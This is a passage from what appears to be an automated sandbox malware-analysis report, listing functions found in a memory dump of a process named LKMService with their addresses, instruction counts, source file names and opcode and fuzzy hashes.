                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67F09032A05309CFDF15DB78E5844ECB77AEBC4225B3005AAE443EF215D6B28E05CB91
                                                                                                                                                                                                                                            Function 058B6C16 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ff20c383188b20891a1e5bbebd28ed35f6c9662eecab95aa7abfa622c4d29d62
                                                                                                                                                                                                                                            • Instruction ID: 6fa73339534c1737757157ff1cbef95be402eceac5980755f8eaab98c5e9f816
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff20c383188b20891a1e5bbebd28ed35f6c9662eecab95aa7abfa622c4d29d62
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0F0B472E10109DBDB14DB74C4659FFBBB69F84310F01852AD412BB340DEB41906D7D1
                                                                                                                                                                                                                                            Function 058B3348 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: af120fe94d12013a683bb8a572984f910b80b2f522c48b1218444a8310f27170
                                                                                                                                                                                                                                            • Instruction ID: 5d77d52e9068a5a9c62e2d2d449b1239cdeefa94d4d9c600cd6e884b22b26355
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af120fe94d12013a683bb8a572984f910b80b2f522c48b1218444a8310f27170
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1F0A732E1010997DF15DB74C8659EFBBBA9F88300F45892AD912FB340EEB4590A97D2
                                                                                                                                                                                                                                            Function 058B9F60 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 10adfe913bbe32d928acd02b08e2558e1e0fcf2f0006f33e78d1ec97674554f5
                                                                                                                                                                                                                                            • Instruction ID: 71a4e1d4c64b550f0f45390aa0c9d61f98423f2cf2b82b651731706628702ab7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 10adfe913bbe32d928acd02b08e2558e1e0fcf2f0006f33e78d1ec97674554f5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BE03935704104AF9B98DA0AD440CAABBABEBC9270318C12AF949C7305DA31DC028B90
                                                                                                                                                                                                                                            Function 058B44A9 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 6ae41b4ab9cb70c8ea1b402938576f170150bc2167a59edf3335ae41a78342d8
                                                                                                                                                                                                                                            • Instruction ID: 0739a54ea004e9db2eb21d0ca5b7fa7d2f676913d062674dcca397ffa0d221da
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ae41b4ab9cb70c8ea1b402938576f170150bc2167a59edf3335ae41a78342d8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9FF03A70F006498F9B09DF68D0948ADFBFAAF8D200725942AD806EB361CE709C41CB01
                                                                                                                                                                                                                                            Function 058B6D61 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3570456a9a059543051c5d88eb74aadecf9b4ce42cd1b595fc5c7dc611281aae
                                                                                                                                                                                                                                            • Instruction ID: 23292359a12ade4d549b273c5e4367e2e688e600a15d3b8e393c40c1a5092010
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3570456a9a059543051c5d88eb74aadecf9b4ce42cd1b595fc5c7dc611281aae
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BE026323441535BD20222BCB4289AD2FDBABC763170400BBE402CF3C2DC510C0D43A2
                                                                                                                                                                                                                                            Function 058B4DB0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e2d09d585e6575ed209a6a59181065d419af7d505543c2f0e621a946d80db184
                                                                                                                                                                                                                                            • Instruction ID: 447637a503ad6682da1a3b596446871e30de8017680b4036328a562c5bb57267
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2d09d585e6575ed209a6a59181065d419af7d505543c2f0e621a946d80db184
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CD0C23130032087CF2862B5A8005AA72DA9F84256710047ED60DC7381D862C84046C6
                                                                                                                                                                                                                                            Function 058B9793 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 81a4d94772ff7b51f45c282071c8704ce9b29d0b873495f2059d3778c16018a1
                                                                                                                                                                                                                                            • Instruction ID: 90506097dfb12022272498a434feeca2f994bb390d8a7a641746dcb740efcce0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81a4d94772ff7b51f45c282071c8704ce9b29d0b873495f2059d3778c16018a1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0F06572A08288DFCB02DF94D9904CCBF72FF42218B5106A6D945A7112D3312F19CF91
                                                                                                                                                                                                                                            Function 058B3070 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3e26106692c34fb82749260923b1f28c12999856afae6ca1229320a0819f6147
                                                                                                                                                                                                                                            • Instruction ID: d0c2370491b85fcc655c8fa24322d9486254a1848004e8438e1f99708d0f35d5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e26106692c34fb82749260923b1f28c12999856afae6ca1229320a0819f6147
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7E04F72D05344AFDB52CFB4D9007ED7BB8BB42244F214599E849DB356DB364E02DB90
                                                                                                                                                                                                                                            Function 058B798D Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: df40b004ffa29810681cd408fc0f1589dc17af0ffbb6327682dc2f04f91c863a
                                                                                                                                                                                                                                            • Instruction ID: 8298d5fb6c2b8ef2bcb1c1549022f7f558dc772d3e12676d9d7f4c5103243d78
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df40b004ffa29810681cd408fc0f1589dc17af0ffbb6327682dc2f04f91c863a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BCE08675609254CFC706DB3084541D8BBF6EB5A108F15469AE595DF351D536CD01CB41
                                                                                                                                                                                                                                            Function 058BCDA8 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 511e97053dfcd81d433555516bc9a33e572387e44960abf293f8d3befec8f294
                                                                                                                                                                                                                                            • Instruction ID: d998518585771df2e62befc599bdaefc57e17785d53ad85d4fe56dc6bdb92356
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 511e97053dfcd81d433555516bc9a33e572387e44960abf293f8d3befec8f294
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2ED02292760A68032A19B1AE24248FFA9CF9ACA960338183AD90DE7340CDC08C0343E7
                                                                                                                                                                                                                                            Function 058B453B Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f5e0887f8d702f410b73359a523f62d2e5a4845b28377e82aae7c0edbd5ec948
                                                                                                                                                                                                                                            • Instruction ID: 85f34d84770adfaefd8b58d2a71a775146aee5387b0c6bd913f1b5a24993c149
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5e0887f8d702f410b73359a523f62d2e5a4845b28377e82aae7c0edbd5ec948
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3E0DF30604646DAE201D778D4607ACFA97BF82304F148E19C8008F7A2CBB2FE14C7E2
                                                                                                                                                                                                                                            Function 058B68E0 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 463f1739285c4c0bc0e60b08f95f21b7ac6b88a7ec9500f183e6204ea595ede2
                                                                                                                                                                                                                                            • Instruction ID: dadf6cffdbc4a4b606711f41750104631fca5ea2e8be8beb917d06c1b3e02dd2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 463f1739285c4c0bc0e60b08f95f21b7ac6b88a7ec9500f183e6204ea595ede2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BE02B13A0F3E90FDB038B308D264D96F74692364031450DFC442DF5D3D4044D0483C2
                                                                                                                                                                                                                                            Function 058B9869 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 0feb28285b30701ead19bbc5a3988bb9b80c72d3b500aa8fa477f466ae7afbab
                                                                                                                                                                                                                                            • Instruction ID: bc594930dbabb7b64e9693580d40ecabe11c45cce9af583a21dd634b8240a8ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0feb28285b30701ead19bbc5a3988bb9b80c72d3b500aa8fa477f466ae7afbab
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AE0EC34B0050A8FDB49AB78849196EAAEAFFC9150B35886DE802DB398D971DD028751
                                                                                                                                                                                                                                            Function 058BA0B1 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3024efd0075ce8f9568bb26bcfc659362251ea327ba07a7c3cc0e527d5878709
                                                                                                                                                                                                                                            • Instruction ID: f101ecad6918bc0e29bdca0ad71103e729b49db89f681582325b0c21c00e57c6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3024efd0075ce8f9568bb26bcfc659362251ea327ba07a7c3cc0e527d5878709
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAD02B2530A2B35BC7122378581044A3F9D9D8312030545C3E425DF7D7C8664C5243E3
                                                                                                                                                                                                                                            Function 058B4DA0 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 010de017bcd8bc96e46a35c60e7df51767eeacdb25488edf217188c9a922e6a1
                                                                                                                                                                                                                                            • Instruction ID: cf95d4a3e1e24409088327636ec2359e6838748c5e5f5eb19592019e28e2964e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 010de017bcd8bc96e46a35c60e7df51767eeacdb25488edf217188c9a922e6a1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81D0A7313283545BEB261275A8006E97BDE5F02259B1800FEEC08C6343E9A28C054291
                                                                                                                                                                                                                                            Function 058B3080 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 49a0f2414c5bf36469d142fa8ea4d98ed96f5af5534b36997f17d892349cc7c3
                                                                                                                                                                                                                                            • Instruction ID: 89105bee294a5508fb8ac7987a9db193ddc0bb8f62337858a28abe0f5c716a6b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49a0f2414c5bf36469d142fa8ea4d98ed96f5af5534b36997f17d892349cc7c3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67D01772905308AFDB11CFB4D50579D7BB9BB05240F610595E849CB346DA319E10DB91
                                                                                                                                                                                                                                            Function 058B67CD Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 6fb5be283f1c6f3f65221bf9771e21a6fcf6eec828e40210a2e54312727f1860
                                                                                                                                                                                                                                            • Instruction ID: 7d2ca1632196d8039d3e1f294ed9009242c29be871758f16fb48ac44cece2803
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fb5be283f1c6f3f65221bf9771e21a6fcf6eec828e40210a2e54312727f1860
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71E04671E082458FE722CF5AC141BDC3AE5BB09284F200086E842EB354E6A1DD80CB25
                                                                                                                                                                                                                                            Function 058B7A60 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 78094fc0f015c5906ecb522d63080df3c80275597f96b4eec129007c770ca724
                                                                                                                                                                                                                                            • Instruction ID: 818affd2f07971fd769ef9ab72cba6ed53c0332e0a37835779c2b79fc4386eec
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78094fc0f015c5906ecb522d63080df3c80275597f96b4eec129007c770ca724
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CE0EC3160120ACFCB19DF74C15449D77F2EF89205B200468E042EB264DA329D01DF91
                                                                                                                                                                                                                                            Function 058B79E8 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2593517c492a1b4475e96361503bb048afa9cd7c1d9e01b8e9e8a4cac9827f9f
                                                                                                                                                                                                                                            • Instruction ID: 6d103bf2d28de196285d1b23d96010d0324f50634651dee3112074e23a389229
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2593517c492a1b4475e96361503bb048afa9cd7c1d9e01b8e9e8a4cac9827f9f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AE0E231600205CFD715DB68C1956AC77F1FB48208F250599F846EB358CA32DD41CB50
                                                                                                                                                                                                                                            Function 058B7A9A Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 34378c1edff423925479b99213e0c9ee435dc35260f31958d3056f7324caac52
                                                                                                                                                                                                                                            • Instruction ID: 39d43e94ce6ff6868af953035c07a97b8ab7f3b3db9ef2b50f442b5b8ec87fc3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34378c1edff423925479b99213e0c9ee435dc35260f31958d3056f7324caac52
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7ED05E33A00218DFEB10CF84EC408ECF731FF81215B044095E202A6102C3B11D15CB50
                                                                                                                                                                                                                                            Function 058BA0C0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 453852f25150025bd393810a7d2780e6618a45f8ab8c73782c6aab2a4c4cfe12
                                                                                                                                                                                                                                            • Instruction ID: 2d27f796e18570c0ed5124f020cf3e9cd31bb5aa76fea7965be8960fad289d12
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 453852f25150025bd393810a7d2780e6618a45f8ab8c73782c6aab2a4c4cfe12
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84C08C2675022D038A1022AC241849AB3CEEA860207508857CC19EBB49CCA3EC0303E3
                                                                                                                                                                                                                                            Function 058B4AF7 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4b0009cee75c7849f2a73f8fec33788d31baf487362fb0a73d0c6c318ff6e7a2
                                                                                                                                                                                                                                            • Instruction ID: 1d959b89730f69c0e19dc5cc78ca950cd2e4fc62f6a560c5bf834e91b0771348
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b0009cee75c7849f2a73f8fec33788d31baf487362fb0a73d0c6c318ff6e7a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13C08C0A71421B873A4840A40D533F3157F29C1544B9CD803CE23EB3EAF692CC0299A2
                                                                                                                                                                                                                                            Function 058B4A1F Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 92c762a9edf4d6812fcaa6e3f6fe7acda9c022f783e2b9bac09e6c3152a79118
                                                                                                                                                                                                                                            • Instruction ID: a72f363227faa866db6043e19289e14d5cee6ffadcce425d860bd315d2d691f9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92c762a9edf4d6812fcaa6e3f6fe7acda9c022f783e2b9bac09e6c3152a79118
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8C0C02004424913CB50FFBCC5040407F00ED800603040305D5848912BC8128A23CA62
                                                                                                                                                                                                                                            Function 058B12AB Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 951cbebefbcdc9cbd65894ed9f68595010a6f34e2bd9c135db2bc99c311cd07f
                                                                                                                                                                                                                                            • Instruction ID: 82c5739a1f6dc843040d6ff0a0dbc5aeaf43432527679df4ccab59c80350af89
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 951cbebefbcdc9cbd65894ed9f68595010a6f34e2bd9c135db2bc99c311cd07f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABC08C60A002879EE700860CA01C377EADA2FA0310F08009A9E02C7348C7E68C129B56
                                                                                                                                                                                                                                            Function 058B47D6 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
